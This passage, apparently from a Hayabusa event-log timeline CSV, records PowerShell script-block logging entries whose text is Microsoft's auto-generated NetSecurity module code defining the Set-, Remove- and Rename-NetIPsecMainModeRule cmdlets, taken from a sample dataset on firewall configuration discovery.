Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 